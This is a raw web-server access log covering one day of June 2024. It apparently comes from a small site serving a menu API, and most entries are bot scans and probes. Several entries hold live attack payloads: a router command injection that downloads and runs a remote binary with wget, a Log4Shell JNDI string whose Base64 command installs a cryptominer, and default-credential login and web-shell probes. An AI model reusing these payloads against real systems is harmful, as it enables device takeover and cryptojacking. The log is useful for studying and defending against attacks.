174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:00:06:50 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 185.180.143.145 - - [07/Jun/2024:00:23:57 +0200] "GET / HTTP/1.1" 200 1895 87.236.176.24 - - [07/Jun/2024:00:24:39 +0200] "GET / HTTP/1.1" 200 1895 206.217.128.98 - - [07/Jun/2024:00:33:24 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [07/Jun/2024:00:39:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.227.254.49 - - [07/Jun/2024:00:58:57 +0200] "-" 400 1930 162.62.209.230 - - [07/Jun/2024:01:42:55 +0200] "GET / HTTP/1.1" 200 1895 45.142.182.121 - - [07/Jun/2024:02:06:32 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 38.61.1.146 - - [07/Jun/2024:02:06:39 +0200] "POST /login HTTP/1.1" 404 723 87.121.69.27 - - [07/Jun/2024:02:08:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.103 - - [07/Jun/2024:02:15:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jun/2024:02:15:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jun/2024:02:15:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 111.7.96.177 - - [07/Jun/2024:02:23:58 +0200] "GET / HTTP/1.1" 200 1895 123.160.221.132 - - [07/Jun/2024:02:24:06 +0200] "GET / HTTP/1.1" 200 1895 45.15.17.3 - - [07/Jun/2024:02:24:07 +0200] "GET /favicon.ico HTTP/1.1" 404 729 111.7.96.154 - - [07/Jun/2024:02:24:21 +0200] "GET / HTTP/1.1" 200 1895 111.7.96.154 - - [07/Jun/2024:02:24:22 +0200] "GET /favicon.ico HTTP/1.1" 404 729 198.235.24.243 - - [07/Jun/2024:02:36:05 +0200] "GET / HTTP/1.1" 200 1895 223.109.64.169 - - [07/Jun/2024:02:57:52 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 749 95.214.55.144 - - [07/Jun/2024:03:20:16 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//85.31.47.62:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1211 164.68.114.58 - - [07/Jun/2024:03:45:48 +0200] "GET /logs HTTP/1.1" 404 722 223.130.11.157 - - [07/Jun/2024:04:09:34 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 167.94.145.106 - - [07/Jun/2024:04:22:39 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.106 - - [07/Jun/2024:04:22:42 +0200] "GET / HTTP/1.1" 200 1895 167.94.145.106 - - [07/Jun/2024:04:22:42 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [07/Jun/2024:04:42:56 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 207.167.67.154 - - [07/Jun/2024:04:54:53 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 178.128.215.23 - - [07/Jun/2024:05:08:39 +0200] "-" 400 1930 178.128.215.23 - - [07/Jun/2024:05:08:39 +0200] "-" 400 1930 178.128.215.23 - - [07/Jun/2024:05:08:39 +0200] "GET / HTTP/1.1" 200 1895 178.128.215.23 - - [07/Jun/2024:05:08:40 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 178.128.215.23 - - [07/Jun/2024:05:08:40 +0200] "-" 400 1930 87.121.69.52 - - [07/Jun/2024:05:10:46 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.32.98 - - [07/Jun/2024:05:26:33 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [07/Jun/2024:05:26:36 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [07/Jun/2024:05:26:36 +0200] "GET /favicon.ico HTTP/1.1" 404 729 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:05:56:57 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 185.180.143.71 - - [07/Jun/2024:06:05:48 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 174.138.2.203 - - [07/Jun/2024:06:06:52 +0200] "POST /dr/tomcat.jsp HTTP/1.1" 404 735 45.142.182.121 - - [07/Jun/2024:06:21:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 124.89.86.192 - - [07/Jun/2024:07:05:40 +0200] "GET / HTTP/1.1" 400 771 64.227.151.65 - - [07/Jun/2024:07:05:43 +0200] "-" 400 1930 64.227.151.65 - - [07/Jun/2024:07:05:43 +0200] "-" 400 1930 64.227.151.65 - - [07/Jun/2024:07:05:43 +0200] "GET / HTTP/1.1" 200 1895 64.227.151.65 - - [07/Jun/2024:07:05:44 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 64.227.151.65 - - [07/Jun/2024:07:05:44 +0200] "-" 400 1930 194.59.31.99 - - [07/Jun/2024:07:29:02 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 78.108.177.54 - - [07/Jun/2024:07:34:40 +0200] "GET / HTTP/1.0" 200 1895 60.191.20.210 - - [07/Jun/2024:07:34:40 +0200] "GET / HTTP/1.1" 200 1895 190.111.182.33 - - [07/Jun/2024:07:55:49 +0200] "GET / HTTP/1.1" 200 1895 205.210.31.89 - - [07/Jun/2024:08:44:15 +0200] "-" 400 1930 205.210.31.89 - - [07/Jun/2024:08:44:16 +0200] "-" 400 1930 38.61.4.212 - - [07/Jun/2024:09:01:33 +0200] "POST /login HTTP/1.1" 404 723 210.87.89.54 - - [07/Jun/2024:09:19:24 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [07/Jun/2024:09:20:28 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 184.105.139.75 - - [07/Jun/2024:10:11:20 +0200] "-" 400 1930 94.156.71.247 - - [07/Jun/2024:10:26:17 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 64.62.197.35 - - [07/Jun/2024:10:41:26 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.44 - - [07/Jun/2024:10:41:55 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.37 - - [07/Jun/2024:10:42:06 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.44 - - [07/Jun/2024:10:42:12 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 87.121.69.52 - - [07/Jun/2024:10:57:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 174.138.2.203 - - [07/Jun/2024:11:42:42 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [07/Jun/2024:11:42:43 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 87.121.69.27 - - [07/Jun/2024:11:59:22 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 80.76.49.130 - - [07/Jun/2024:12:12:58 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 147.185.132.135 - - [07/Jun/2024:12:40:32 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.121 - - [07/Jun/2024:12:49:06 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 205.210.31.86 - - [07/Jun/2024:13:14:30 +0200] "GET / HTTP/1.1" 200 1895 127.0.0.1 - - [07/Jun/2024:13:34:41 +0200] "OPTIONS /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 - 127.0.0.1 - - [07/Jun/2024:13:34:41 +0200] "GET /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 9131 127.0.0.1 - - [07/Jun/2024:13:34:53 +0200] "OPTIONS /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 - 127.0.0.1 - - [07/Jun/2024:13:34:53 +0200] "GET /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 9131 87.121.69.27 - - [07/Jun/2024:13:53:11 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [07/Jun/2024:13:58:51 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 185.198.69.122 - - [07/Jun/2024:14:12:14 +0200] "-" 400 1930 185.216.71.4 - - [07/Jun/2024:14:13:02 +0200] "CONNECT pro.ip-api.com:443 HTTP/1.1" 400 804 185.216.71.4 - - [07/Jun/2024:14:13:02 +0200] "-" 400 1930 127.0.0.1 - - [07/Jun/2024:14:57:44 +0200] "OPTIONS /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 - 127.0.0.1 - - [07/Jun/2024:14:57:44 +0200] "GET /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 9131 127.0.0.1 - - [07/Jun/2024:14:58:21 +0200] "GET /sodexomenu/api/menuinfo/center/2482/date/7-6-2024 HTTP/1.1" 200 9131 87.121.69.27 - - [07/Jun/2024:15:12:15 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 37.130.64.206 - - [07/Jun/2024:15:22:03 +0200] "GET / HTTP/1.0" 200 1895 45.142.182.121 - - [07/Jun/2024:15:33:39 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.230%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 165.154.150.65 - - [07/Jun/2024:15:51:24 +0200] "-" 400 1930 165.154.150.65 - - [07/Jun/2024:15:51:35 +0200] "GET / HTTP/1.1" 200 1895 165.154.150.65 - - [07/Jun/2024:15:51:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 165.154.150.65 - - [07/Jun/2024:15:51:55 +0200] "GET /robots.txt HTTP/1.1" 404 728 165.154.150.65 - - [07/Jun/2024:15:51:55 +0200] "GET /sitemap.xml HTTP/1.1" 404 729 23.90.165.142 - - [07/Jun/2024:15:53:57 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [07/Jun/2024:15:55:34 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [07/Jun/2024:15:55:37 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [07/Jun/2024:15:55:37 +0200] "GET /favicon.ico HTTP/1.1" 404 729 117.255.93.217 - - [07/Jun/2024:15:58:49 +0200] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 749 84.54.51.164 - - [07/Jun/2024:16:26:25 +0200] "POST /login HTTP/1.1" 404 723 85.90.246.159 - - [07/Jun/2024:17:07:10 +0200] "GET /?20628182016134805143312Ex HTTP/1.1" 200 1895 87.121.69.52 - - [07/Jun/2024:17:17:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 64.112.72.166 - - [07/Jun/2024:17:18:28 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 185.100.87.136 - - [07/Jun/2024:17:23:48 +0200] "-" 400 1930 185.100.87.136 - - [07/Jun/2024:17:23:48 +0200] "POST /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7 HTTP/1.1" 404 754 3.9.179.70 - - [07/Jun/2024:17:32:07 +0200] "-" 400 1930 3.9.179.70 - - [07/Jun/2024:17:38:45 +0200] "-" 400 1930 3.9.179.70 - - [07/Jun/2024:17:49:09 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [07/Jun/2024:17:58:05 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 3.9.179.70 - - [07/Jun/2024:18:26:29 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 740 203.138.220.56 - - [07/Jun/2024:18:48:01 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 3.9.179.70 - - [07/Jun/2024:18:51:09 +0200] "-" 400 1930 91.92.251.254 - - [07/Jun/2024:18:56:26 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 87.121.69.27 - - [07/Jun/2024:19:08:06 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 3.9.179.70 - - [07/Jun/2024:19:11:30 +0200] "-" 400 1930 45.141.86.171 - - [07/Jun/2024:19:43:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 14.116.254.172 - - [07/Jun/2024:19:46:57 +0200] "GET / HTTP/1.1" 200 1895 121.147.219.126 - - [07/Jun/2024:19:52:29 +0200] "GET / HTTP/1.0" 200 1895 104.168.70.165 - - [07/Jun/2024:20:02:40 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jun/2024:20:22:18 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jun/2024:20:22:21 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.103 - - [07/Jun/2024:20:22:21 +0200] "GET /favicon.ico HTTP/1.1" 404 729 87.121.69.27 - - [07/Jun/2024:21:10:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 205.210.31.102 - - [07/Jun/2024:22:02:12 +0200] "GET / HTTP/1.0" 200 1895 198.235.24.120 - - [07/Jun/2024:22:14:16 +0200] "GET / HTTP/1.1" 200 1895 60.191.20.210 - - [07/Jun/2024:22:27:49 +0200] "-" 400 1930 45.141.86.171 - - [07/Jun/2024:22:48:34 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 115.231.78.12 - - [07/Jun/2024:22:51:19 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [07/Jun/2024:22:52:28 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [07/Jun/2024:22:52:29 +0200] "GET /robots.txt HTTP/1.1" 404 728 143.110.232.108 - - [07/Jun/2024:23:03:10 +0200] "-" 400 1930 143.110.232.108 - - [07/Jun/2024:23:03:10 +0200] "-" 400 1930 143.110.232.108 - - [07/Jun/2024:23:03:10 +0200] "GET / HTTP/1.1" 200 1895 143.110.232.108 - - [07/Jun/2024:23:03:10 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 143.110.232.108 - - [07/Jun/2024:23:03:11 +0200] "-" 400 1930 87.121.69.52 - - [07/Jun/2024:23:24:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804